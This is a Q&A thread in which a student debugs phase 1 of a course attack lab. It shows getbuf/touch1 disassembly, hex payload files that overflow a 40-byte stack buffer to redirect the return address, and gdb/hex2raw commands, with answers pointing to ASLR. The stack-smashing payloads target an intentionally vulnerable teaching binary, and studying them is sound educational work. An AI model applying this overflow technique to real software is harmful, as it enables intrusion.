# Attack Lab Phase 1 Segmentation Fault

Tags: assembly, overloading, buffer

The phase 1 for my attack lab goes something like this:

Ctarget goes through getbuf(), in which I should create a buffer for the function to jump directly to the function touch1() instead of the function test().

From my understanding, I should find the buffer size and create a padding for it, then after the padding input the little endian address of touch1().

```
0000000000001afc <getbuf>:
1afc:   48 83 ec 28             sub    $0x28,%rsp
1b00:   48 89 e7                mov    %rsp,%rdi
1b03:   e8 94 02 00 00          callq  1d9c <Gets>
1b08:   b8 01 00 00 00          mov    $0x1,%eax
1b0d:   48 83 c4 28             add    $0x28,%rsp
1b11:   c3                      retq   

0000000000001b12 <touch1>:
1b12:   48 83 ec 08             sub    $0x8,%rsp
1b16:   c7 05 bc 38 20 00 01    movl   $0x1,0x2038bc(%rip)        # 2053dc <vlevel>
1b1d:   00 00 00 
1b20:   48 8d 3d ab 19 00 00    lea    0x19ab(%rip),%rdi        # 34d2 <_IO_stdin_used+0x312>
1b27:   e8 64 f3 ff ff          callq  e90 <puts@plt>
1b2c:   bf 01 00 00 00          mov    $0x1,%edi
1b31:   e8 d6 04 00 00          callq  200c <validate>
1b36:   bf 00 00 00 00          mov    $0x0,%edi
1b3b:   e8 c0 f4 ff ff          callq  1000 <exit@plt>
```

In getbuf(), I see that the size of the buffer should be 0x28, which is 40 in decimal, so there should be a padding of 40 bytes. The address of touch1() is 0000000000001b12, the little endian would make it 12 1b 00 00 00 00 00 00.

I create a phase1.txt:

```html
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
12 1b 00 00 00 00 00 00
```

There are 40 bytes of padding then the little endian of the touch1() address, but when I run it it gives me a segmentation fault.

I don't know what I am doing wrong, because after I tried my version I looked up online what other people did and that was the same thing I did.

Edit 1:

I gave some wrong information earlier, I had to remove 9 bytes from the padding for the segmentation fault to not occur, so in total 31 bytes of padding and 8 bytes of the address. Not sure if this helps.

Edit 2:

I ran gdb ctarget, and added a breakpoint at getbuf. When I ran info address touch1 this address appears:

`(gdb) info address touch1
Symbol "touch1" is a function at address 0x555555555b12.`

After seeing this, I changed my phase1.txt to this:

```html
CC CC CC CC CC CC CC CC
CC CC CC CC CC CC CC CC
CC CC CC CC CC CC CC CC
CC CC CC CC CC CC CC CC
CC 55 55 55 55 5b 12
```

After running `cat phase1.txt | ./hex2raw | ./ctarget` there is not longer a segmentation fault because there are less than 40 bytes, but it is not still not running. I am not sure if I should be putting 40 bytes in total or 40 bytes for padding then the address.

Final Edit:

Turns out the problem was not the text file I was entering in, rather the ASLR. Since I was running it in GDB, the addresses also had to be taken from GDB, and ran on GDB. I had to run the .txt file through the hex2raw, then take the raw and put it inside the GDB, something like this:

- cat phase1.txt | ./hex2raw > raw1.txt
- gdb ctarget
- r < raw1.txt

Thanks to everyone for the help!

Comment: `1b12` is the non-relocated address, you need to find the address of the function *once* loaded in memory. This is something that is made hard by the modern protection systems. If you commit to always run your program under gdb, then you can use the `info address touch1` command to find the address of the function.

Comment: @MargaretBloom Thank you for the response! I have tried info address touch1 before as well, but even then it gives me the same address (0x1b12), so I don't think that is the problem. Even so it doesn't explain why after 40 bytes, it is still giving a segmentation fault, so I think there is something that I am missing in the logic or getbuf() code.

Comment: Yes, sorry. GDB uses the addresses you listed with `objdump`. I advise you to set a breakpoint in `getbuf` and follow where it returns (and what's there). Remember: you must always run the application under GDB, even when testing the payload, unless you disabled ASLR.

Comment: You have to start the program inside GDB so GDB can get addresses from the running process, not just the disk file.  GDB uses the same binutils library as objdump for reading file metadata.

Comment: @MargaretBloom ah got it, so after running gdb and setting a breakpoint in getbuf, I tried info address touch1 and it returned 0x555555555b12 which is also very similar to 0x0000000000001b12. So if this address is the actual address of touch1, I should input this into the ctarget instead? BTW to run the program I am typing in "cat phase1.txt | ./hex2raw | ./ctarget".

Comment: Yes, you need to use the actual address. But Linux changes that each time you run the program unless explicitly told not to. GDB disable this, that's why you should always use it. Unless you were told differently in the course.

Comment: @MargaretBloom I'm on mac so I don't know if it changes it each time, but I've ran it a couple of times and it is still 0x555555555b12. My phase1.txt is now 33 bytes of 00 followed by the little endian of the touch1 address, but its still not working, which makes me think it has something to do with the amount of bytes in the padding. Phase1.txt and info address touch1 is in edit 2.

Comment: Did the total of bytes have to be exactly 40?

Answer (score 1):

Turns out the problem was not the text file I was entering in, rather the ASLR. Since I was running it in GDB, the addresses also had to be taken from GDB, and ran on GDB. I had to run the .txt file through the hex2raw, then take the raw and put it inside the GDB, something like this:

- cat phase1.txt | ./hex2raw > raw1.txt
- gdb ctarget
- r < raw1.txt